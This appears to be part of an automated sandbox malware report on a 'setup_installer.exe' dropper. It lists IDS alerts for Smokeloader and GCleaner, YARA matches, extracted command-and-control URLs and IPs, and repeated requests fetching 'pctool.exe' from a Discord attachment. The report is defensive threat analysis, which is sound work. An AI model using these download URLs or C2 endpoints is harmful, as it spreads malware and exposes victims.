                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00473794
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F850
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F9D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov dword ptr [ecx], 004AB6BCh2_2_0047D9F2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FA29
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00465AD2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040DB40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_00421BA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040DCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub edx, 01h2_2_0041D030
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FE40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FEE0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_00461F60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebx2_2_00461F60

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59995 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59995 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60043 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60002 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60002 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60040 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60040 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60033 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60015 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60076 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60076 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59968 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59968 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60078 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60078 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2847712 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 17 : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60033 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60115 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60115 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60015 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60048 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60057 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60043 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60101 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60085 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60082 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60082 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59980 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59980 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60097 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60052 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60045 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60045 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850316 - Severity 1 - ETPRO MALWARE Observed SmokeLoader CnC Activity : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60006 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60048 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60066 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60013 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60013 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60063 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60063 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60006 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60103 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60085 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60010 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60097 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60052 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60010 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60061 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60066 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60061 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60057 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60018 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60018 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60103 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60088 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60070 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60070 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60024 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60022 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60022 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60024 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60101 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60073 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60073 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60027 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60106 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60027 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60106 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60088 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60093 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60093 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60110 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60110 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60113 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60031 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60113 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60031 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60055 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60055 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60036 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60036 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60091 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60091 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60118 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60118 -> 45.9.20.13:80
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mon1785436ae78.exe PID: 8076, type: MEMORYSTR
                  Source: Malware configuration extractorURLs: http://lecanardstsornin.com/upload/
                  Source: Malware configuration extractorURLs: http://m3600.com/upload/
                  Source: Malware configuration extractorURLs: http://camasirx.com/upload/
                  Source: Malware configuration extractorURLs: 135.181.129.119:4805
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 45.142.215.47 ports 27643,2,3,4,6,7
                  Source: DNS query: hsiens.xyz
                  Source: Yara matchFile source: Process Memory Space: Mon178817e243.exe PID: 7972, type: MEMORYSTR
                  Source: Yara matchFile source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.4:59936 -> 45.142.215.47:27643
                  Source: global trafficTCP traffic: 192.168.2.4:59971 -> 135.181.129.119:4805
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a3jd7 HTTP/1.1Host: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
                  Source: Joe Sandbox ViewIP Address: 172.67.133.215 172.67.133.215
                  Source: Joe Sandbox ViewIP Address: 172.67.133.215 172.67.133.215
                  Source: Joe Sandbox ViewIP Address: 45.133.1.107 45.133.1.107
                  Source: Joe Sandbox ViewIP Address: 45.133.1.107 45.133.1.107
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownDNS query: name: iplogger.org
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59988 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59953 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60075 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59942 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59994 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60112 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59991 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60067 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60000 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60041 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59972 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59940 -> 172.67.132.113:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59969 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60062 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60058 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60004 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59978 -> 162.159.130.233:443
